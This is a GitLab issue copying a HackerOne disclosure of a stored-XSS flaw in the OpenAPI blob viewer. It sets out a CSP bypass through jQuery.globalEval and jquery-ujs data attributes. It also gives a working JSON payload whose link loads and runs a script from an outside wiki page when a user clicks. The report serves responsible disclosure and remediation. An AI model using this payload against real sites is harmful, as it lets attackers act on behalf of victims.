Skip to content

Stored XSS in blob viewer

HackerOne report #806571 by yvvdwf on 2020-02-27, assigned to @jeremymatos:

Summary

I found a Stored-XSS in blob viewer when viewing a json file.

In particular, when viewing an openapi file, openapi_viewer is called to transfer the file's data to SwaggerUIBundle to render.

SwaggerUIBundle does its job when rending graphical representation of the openapi's content. It also allows html tags and attributes in the description of the openapi. Although it removes malicious tags and attributes, but this is not enough in gitlab's context:

  1. class and style attributes allow attackers to arbitrarily present their disposition. My demo below uses class attribute to create a transparent layer that fulfils the document to intercept any user's clics.

  2. data-* attributes, under the help of jquery-ujs, allows attackers to create any requests to server when user clicking (not only GET, but also, PUT, DELETE, HEAD) with arbitrary parameters

  3. The current CSP is easily by passed by jQuery.globalEval. In my demo below, you should see an alert after clicking anywhere

Steps to reproduce

  1. In any project, create a file naming xss-openapi.json, then put the following content:
{
  "swagger" : "2.0",  
  "info" : {  
    "description" : "<a href=https://gitlab.com/yvvdwf/data/-/wikis/alert.md data-type=script style='cursor:default' data-remote=true class='atwho-view select2-drop-mask pika-select'></a><script>alert(0)</script>"  
  }}
  1. Click anywhere on the document view, you should see an alert.

Impact

There are three impacts as in the Summary above. The most important impact is the stored-XSS allowing attackers to perform any action on behalf of users at the client side.

Examples

(This repository is in private mode, please let me know if you cannot access it)
https://gitlab.com/yvvdwf/xss/-/blob/master/xss-openapi.json

What is the current bug behavior?

Gitlab does not check the result generated by SwaggerUIBundle

What is the expected correct behavior?

Should remove any inappropriate html attributes, such as, data-*, style, class.

Output of checks

This bug happens on GitLab.com

Impact

The stored-XSS allows attackers to perform any action on behalf of users at the client side.

Edited by Nick Thomas